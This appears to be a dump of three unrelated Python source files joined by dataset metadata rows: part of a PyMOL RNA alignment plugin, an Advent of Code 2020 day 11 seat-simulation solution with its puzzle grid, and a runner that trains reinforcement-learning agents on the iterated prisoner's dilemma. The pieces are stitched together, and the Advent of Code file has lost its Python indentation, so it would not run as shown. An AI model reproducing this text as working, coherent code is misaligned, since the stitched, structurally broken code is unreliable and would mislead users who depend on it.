cmd.do(' ')
cmd.do('# pretty printing')
cmd.do('import pprint')
cmd.do(' ')
cmd.do('# for importing as a plugin into PyMol')
cmd.do('from pymol import cmd')
cmd.do('from pymol import stored')
cmd.do('from pymol import selector')
cmd.do(' ')
cmd.do('# using numpy for linear algebra')
cmd.do('import numpy')
cmd.do(' ')
cmd.do('def optAlignRNA( sel1, sel2 ):')
cmd.do(' """')
cmd.do(" optAlignRNA performs the Kabsch alignment algorithm upon the C1' carbons of two selections.")
cmd.do(" Example: optAlignRNA 1JU7 and i. 1-16 and n. C1', 1CLL and i. 4-146 and n. C1'")
cmd.do(' ')
cmd.do(' Two RMSDs are returned. One comes from the Kabsch algorithm and the other from')
cmd.do(' PyMOL based upon your selections.')
cmd.do(' ')
cmd.do(' This function can be run in a for loop to fit multiple structures with a common prefix name:')
cmd.do(' ')
cmd.do(' for x in cmd.get_names(): optAlignRNA(x, "1JU7_0001")')
cmd.do(' ')
cmd.do(' or get the rmsds for all combinations, do the following:')
cmd.do(' ')
cmd.do(' [[optAlignRNA(x, y) for x in cmd.get_names()] for y in cmd.get_names()]')
cmd.do('')
cmd.do(' """')
cmd.do(' cmd.reset()')
cmd.do(' ')
cmd.do(' # make the lists for holding coordinates')
cmd.do(' # partial lists')
cmd.do(' stored.sel1 = []')
cmd.do(' stored.sel2 = []')
cmd.do(' # full lists')
cmd.do(' stored.mol1 = []')
cmd.do(' stored.mol2 = []')
cmd.do(' ')
cmd.do(' # -- CUT HERE')
cmd.do(' sel1 += " and N. C1\'"')
cmd.do(' sel2 += " and N. C1\'"')
cmd.do(' # -- CUT HERE')
cmd.do(' ')
cmd.do(' # Get the selected coordinates. We')
cmd.do(' # align these coords.')
cmd.do(' cmd.iterate_state(1, selector.process(sel1), "stored.sel1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, selector.process(sel2), "stored.sel2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # get molecule name')
cmd.do(' mol1 = cmd.identify(sel1,1)[0][0]')
cmd.do(' mol2 = cmd.identify(sel2,1)[0][0]')
cmd.do(' ')
cmd.do(' # Get all molecule coords. We do this because')
cmd.do(' # we have to rotate the whole molcule, not just')
cmd.do(' # the aligned selection')
cmd.do(' cmd.iterate_state(1, mol1, "stored.mol1.append([x,y,z])")')
cmd.do(' cmd.iterate_state(1, mol2, "stored.mol2.append([x,y,z])")')
cmd.do(' ')
cmd.do(' # check for consistency')
cmd.do(' assert len(stored.sel1) == len(stored.sel2)')
cmd.do(' L = len(stored.sel1)')
cmd.do(' assert L > 0')
cmd.do(' ')
cmd.do(' # must alway center the two proteins to avoid')
cmd.do(' # affine transformations. Center the two proteins')
cmd.do(' # to their selections.')
cmd.do(' COM1 = numpy.sum(stored.sel1,axis=0) / float(L)')
cmd.do(' COM2 = numpy.sum(stored.sel2,axis=0) / float(L)')
cmd.do(' stored.sel1 -= COM1')
cmd.do(' stored.sel2 -= COM2')
cmd.do(' ')
cmd.do(' # Initial residual, see Kabsch.')
cmd.do(' E0 = numpy.sum( numpy.sum(stored.sel1 * stored.sel1,axis=0),axis=0) + numpy.sum( numpy.sum(stored.sel2 * stored.sel2,axis=0),axis=0)')
cmd.do(' ')
cmd.do(' #')
cmd.do(' # This beautiful step provides the answer. V and Wt are the orthonormal')
cmd.do(' # bases that when multiplied by each other give us the rotation matrix, U.')
cmd.do(" # S, (Sigma, from SVD) provides us with the error! Isn't SVD great!")
cmd.do(' V, S, Wt = numpy.linalg.svd( numpy.dot( numpy.transpose(stored.sel2), stored.sel1))')
cmd.do(' ')
cmd.do(' # we already have our solution, in the results from SVD.')
cmd.do(' # we just need to check for reflections and then produce')
cmd.do(" # the rotation. V and Wt are orthonormal, so their det's")
cmd.do(' # are +/-1.')
cmd.do(' reflect = float(str(float(numpy.linalg.det(V) * numpy.linalg.det(Wt))))')
cmd.do(' ')
cmd.do(' if reflect == -1.0:')
cmd.do(' S[-1] = -S[-1]')
cmd.do(' V[:,-1] = -V[:,-1]')
cmd.do(' ')
cmd.do(' RMSD = E0 - (2.0 * sum(S))')
cmd.do(' RMSD = numpy.sqrt(abs(RMSD / L))')
cmd.do(' ')
cmd.do(' #U is simply V*Wt')
cmd.do(' U = numpy.dot(V, Wt)')
cmd.do(' ')
cmd.do(' # rotate and translate the molecule')
cmd.do(' stored.sel2 = numpy.dot((stored.mol2 - COM2), U)')
cmd.do(' stored.sel2 = stored.sel2.tolist()')
cmd.do(' # center the molecule')
cmd.do(' stored.sel1 = stored.mol1 - COM1')
cmd.do(' stored.sel1 = stored.sel1.tolist()')
cmd.do(' ')
cmd.do(' # let PyMol know about the changes to the coordinates')
cmd.do(' cmd.alter_state(1,mol1,"(x,y,z)=stored.sel1.pop(0)")')
cmd.do(' cmd.alter_state(1,mol2,"(x,y,z)=stored.sel2.pop(0)")')
cmd.do(' ')
cmd.do(' #print("Moved: %s Reference: %s RMSD = %f" % mol1, mol2, RMSD)')
cmd.do(' print("% s, % s,% 5.3f" % (mol1, mol2, RMSD))')
cmd.do(' ')
cmd.do(' # make the alignment OBVIOUS')
cmd.do(' cmd.hide("everything")')
cmd.do(' cmd.show("ribbon", sel1 + " or " + sel2)')
cmd.do(' cmd.color("gray70", mol1 )')
cmd.do(' cmd.color("magenta", mol2 )')
cmd.do(' cmd.color("red", "visible")')
cmd.do(' cmd.show("ribbon", "not visible")')
cmd.do(' cmd.center("visible")')
cmd.do(' cmd.orient()')
cmd.do(' cmd.zoom("visible")')
cmd.do(' ')
cmd.do('cmd.extend("optAlignRNA", optAlignRNA)')
cmd.do('python end')
| 41.419453
| 143
| 0.634329
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11,486
| 0.842885
|
220378f315f7e2f7d8cd6b8b856c000fc8a490f5
| 12,933
|
py
|
Python
|
2020/day11.py
|
asmeurer/advent-of-code
|
3ba3edb0c29994487f1b3344383dc41dfea9bfcb
|
[
"MIT"
] | null | null | null |
2020/day11.py
|
asmeurer/advent-of-code
|
3ba3edb0c29994487f1b3344383dc41dfea9bfcb
|
[
"MIT"
] | null | null | null |
2020/day11.py
|
asmeurer/advent-of-code
|
3ba3edb0c29994487f1b3344383dc41dfea9bfcb
|
[
"MIT"
] | null | null | null |
test_input = """
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
"""
test_input2 = """
.......#.
...#.....
.#.......
.........
..#L....#
....#....
.........
#........
...#.....
"""
test_input3 = """
.............
.L.L.#.#.#.#.
.............
"""
test_input4 = """
.##.##.
#.#.#.#
##...##
...L...
##...##
#.#.#.#
.##.##.
"""
input = """
LL.LL.LLLLLL.LLLLLLLLLLLLLLLLLL.LLLLL..LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLL.LL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LL.LLLLLLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
.LL...LL.L.L....LL..LL..L.L.L..L.....L...LL.....LLL..L..L..L.....L.L..LLLL...LL.LL.L.......
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL..LLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LL.LLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LL.L......L...LL....L...L.LL.L.....L.LL.L....L...LLL....LL.....LL.L.LLL...LL.L...LLL.L.L...
LLLLLLLLLLLL.LLLLLLLL.L.LL.L.LLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLLLLL.LL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.L.LLLLL.LLLLLLLLLLLL.LLLL.LLLLLLL..LLLLLL.LLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.L.LL.LLLLL
.LLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
...L..L......L..L.L.......LL...L.LL.L...LL...L..LL....L....L.L..L...L...L.L.....LL.....L..L
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLL.LL
LLLLL.LLLLLLLL.LL.LLLLLLLL.LLLL.LLLLLL.LLLLLLLLLLL.L.LLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLL.LLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.L.LLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLL.LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
.......LL.L.L...LL..L....LL....L.L.L....L......L..LL...LL.LLL..L....L......L.LLL.L.....LLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLLLLLL.LLLLLLLLL.LLLL.L.LLLL.LLLLLLLL.LLLLLL.L.LLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLL.
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL.LLL.LLLLLLLL.LLLL.LLLLLLLL.LLLLLL.LLL..LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLLLLL.LLLLLLL
LLLLL.LLLLLL.LL.LLLLLLLLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLL.LLLL.LLLLLLLLLLLLLLLLL
.L........L..L.L.LLLLL.......LL.......L..L.L..LL.L......L.......LLL..LLL.LL...L.L...L.LL.L.
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL..LLLLL.LLLLLLLL.LLLL.LLL..LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLL..LLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
..L..LL.......L.LLLL.L.....L...L.LL...LLLLL.L.....L..L...LL.LL..L..LLLLLL..........LL.....L
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL..LLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL..LLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL.LL.LLLLLLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLL.LLLL..LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
L...LL....L..L..LL.........L.L...LL..LL.L....L...........LL.L.......L.L.L.......L..L..LL..L
LLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLL.LLLLL.LL.LLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.L.LLLLLLLLLLL.LL.LLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLL.L.LLLL.LLLLLLLLLLLL..L.LLLL.L.LL.LLLLLLLL.LLLLLLLLLLLLLLLL.
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLL.LLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
.....L.LLL...LL..LL.....L....LL.......L...LL..L..L...L...L.LL.LL.LL...LL..LLL.L..LLL..LLLL.
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLLLLLLLL.L.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLLLLLL.LLLLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL..LLL.LLLLLLLLLLLLLL.LLLL..LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLLLLL.LL.LLLLLLLLLLLLL.LL.LLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
..L..LL.........L....L.L.L.L...L....L...........LL....L..L...L.LL..L..LL.L..LL..L..L.L..L.L
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
....L............L....LL......L.LLL.LLL....LL.....L..L.LL.L........L..L......L.LLL..LL..LL.
LL.LLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.L.LLLLLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL.LLLLLLLL..LLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL..LLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLL.LL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.L.LLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
.L......LLL...L.L.LL.L.....LL.L..L.L.LLLLL....LL..L...L..L.....L.L...L...L.L.LL.LL.L.......
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLL..LLLLLLLLL.LLLLLL.LLLLLLL.LLLLL.LLLLL..LLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
"""
import numpy as np
val = {'L': -1, '#': 1, '.': 0}
rval = {v: k for k, v in val.items()}
def strtoarray(text):
return np.array([[val[i] for i in line] for line in
text.strip().splitlines()])
def arraytostr(a):
if a.ndim == 1:
a = a.reshape((1, a.size))
return '\n'.join([''.join([rval[i] for i in row]) for row in a])
def adjacent(a, i, j):
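    # Values of the up-to-8 cells immediately surrounding (i, j),
    # clipped at the edges of the grid.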
rows, cols = a.shape
adj = []
for newi in [i - 1, i, i + 1]:
for newj in [j - 1, j, j + 1]:
if (newi, newj) == (i, j):
continue
if newi < 0 or newj < 0:
continue
if newi >= rows or newj >= cols:
continue
adj.append(a[newi, newj])
return np.array(adj)
def adjacent2(a, i, j):
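    # Part 2 neighbourhood: walk outward in each of the 8 directions and
    # keep the first seat (occupied or empty) visible from (i, j).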
rows, cols = a.shape
adj = []
for idir in [-1, 0, 1]:
for jdir in [-1, 0, 1]:
if idir == jdir == 0:
continue
for x in range(1, max(rows, cols)):
newi = i + idir*x
newj = j + jdir*x
if newi < 0 or newi >= rows or newj < 0 or newj >= cols:
break
c = a[newi, newj]
if c in [-1, 1]:
adj.append(c)
break
return np.array(adj)
def apply_rules(a):
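    # One generation of the part 1 rules: an empty seat (-1) with no occupied
    # neighbours becomes occupied (1); an occupied seat with 4 or more
    # occupied neighbours becomes empty.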
newa = a.copy()
rows, cols = a.shape
changed = False
for i in range(rows):
for j in range(cols):
if a[i, j] == 0:
continue
adj = adjacent(a, i, j)
if a[i, j] == -1 and np.sum(adj==1) == 0:
changed = True
newa[i, j] = 1
elif a[i, j] == 1 and np.sum(adj==1) >= 4:
changed = True
newa[i, j] = -1
return newa, changed
def generations(a):
n = 0
while True:
print("Generation", n)
print(arraytostr(a))
print()
a, changed = apply_rules(a)
if not changed:
return a
n += 1
def apply_rules2(a):
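    # Same sweep as apply_rules, but using line-of-sight neighbours and a
    # higher tolerance of 5 occupied seats before a seat empties.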
newa = a.copy()
rows, cols = a.shape
changed = False
for i in range(rows):
for j in range(cols):
if a[i, j] == 0:
continue
adj = adjacent2(a, i, j)
if a[i, j] == -1 and np.sum(adj==1) == 0:
changed = True
newa[i, j] = 1
elif a[i, j] == 1 and np.sum(adj==1) >= 5:
changed = True
newa[i, j] = -1
return newa, changed
def generations2(a):
n = 0
while True:
print("Generation", n)
print(arraytostr(a))
print()
a, changed = apply_rules2(a)
if not changed:
return a
n += 1
print("Day 11")
print("Part 1")
print("Test input")
testa = strtoarray(test_input)
print(test_input)
print(testa)
print(arraytostr(testa))
print("Adjacent to 0, 0", arraytostr(adjacent(testa, 0, 0)))
print("Adjacent to 2, 2", arraytostr(adjacent(testa, 2, 2)))
test_finala = generations(testa)
print(np.sum(test_finala == 1))
print("Puzzle input")
a = strtoarray(input)
finala = generations(a)
print(np.sum(finala == 1))
print("Part 2")
print("Test input")
testa2 = strtoarray(test_input2)
assert testa2[4, 3] == -1
print(adjacent2(testa2, 4, 3))
testa3 = strtoarray(test_input3)
assert testa3[1, 3] == -1
print(adjacent2(testa3, 1, 3))
testa4 = strtoarray(test_input4)
assert testa4[3, 3] == -1
print(adjacent2(testa4, 3, 3))
test_finala = generations2(testa)
print(np.sum(test_finala==1))
print("Puzzle input")
finala = generations2(a)
print(np.sum(finala == 1))
| 45.861702
| 91
| 0.718163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9,408
| 0.727441
|
220420bd932e73713baed1135186d8fa37af4fd2
| 2,849
|
py
|
Python
|
final/runner_2.py
|
Pluriscient/sma2c-ipd
|
e6e4a5240930491a996afda4744714c5c4826ac2
|
[
"MIT"
] | null | null | null |
final/runner_2.py
|
Pluriscient/sma2c-ipd
|
e6e4a5240930491a996afda4744714c5c4826ac2
|
[
"MIT"
] | null | null | null |
final/runner_2.py
|
Pluriscient/sma2c-ipd
|
e6e4a5240930491a996afda4744714c5c4826ac2
|
[
"MIT"
] | null | null | null |
from SMA2CAgent import SMA2CAgent
from A2CAgent import A2CAgent
from RandomAgent import RandomAgent
# from .SMA2CAgent import SMA2CAgent
import gym
import numpy as np
from IPD_fixed import IPDEnv
import axelrod
import time
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--rounds", help='number of rounds to play per episode', type=int, default=20)
parser.add_argument("--episodes", help='number of episodes to play', type=int, default=1000)
parser.add_argument("--seed", help='random seed, -1 if random', type=int, default=-1)
parser.add_argument("--output", help="output folder", default=f'output-{time.time():.0f}')
parser.add_argument("--pure-a2c", help="Don't use an encoder", action='store_true')
parser.add_argument("--alpha", help='LR of encoder', type=float)
parser.add_argument("--beta", help = 'LR of A2C agent', type=float)
parser.add_argument("--lstm-dims", help='LSTM dimensions', type=int)
parser.add_argument("--encoder-fc", help='dimensions of encoder dense layers',type=int, action='append')
parser.add_argument("--a2c-fc", help='dimensions of a2c hidden layers', type=int, action='append')
parser.add_argument("--latent-dims", help='dimensions of code', type=int)
parser.add_argument("opponents", help='opponents that the bot should face', nargs="*")
parser.add_argument("--random", help="Don't use an agent, just random", action='store_true')
# parser.add_argument("")
args = parser.parse_args()
opponents = []
strats = dict([(s.name.lower(), s) for s in axelrod.all_strategies])
for opp in args.opponents:
if opp not in strats:
            print(f'{opp} not found in strats')
            continue
s = strats[opp]
opponents.append(s)
    env = IPDEnv({'rounds': args.rounds, 'opponents': opponents})
seed = args.seed if args.seed != -1 else None
env.seed(seed=seed)
# remove empty values
config = {k: v for k, v in vars(args).items() if v is not None}
if config['pure_a2c']:
print("____USING PURE A2C_____")
        agent = A2CAgent(env, config)
elif config['random']:
print("__RANDOM AGENT___")
agent = RandomAgent(env, config)
else:
print("____USING SMA2C______")
agent = SMA2CAgent(env, config)
# obs = env.reset()
# action = agent.act(obs, 0, 0, 1)
# print(f'resulting action: {action}')
# encodings_before = np.array(agent.encode_run(axelrod.Cooperator()))
# print(f'encodings before: {encodings_before}')
agent.run(episodes=args.episodes)
# encodings_after_c = np.array(agent.encode_run(axelrod.Cooperator()))
# encodings_after_d = np.array(agent.encode_run(axelrod.Defector()))
# print(f'encodings after: {encodings_after_c}')
# print(encodings_after_d)
agent.save()
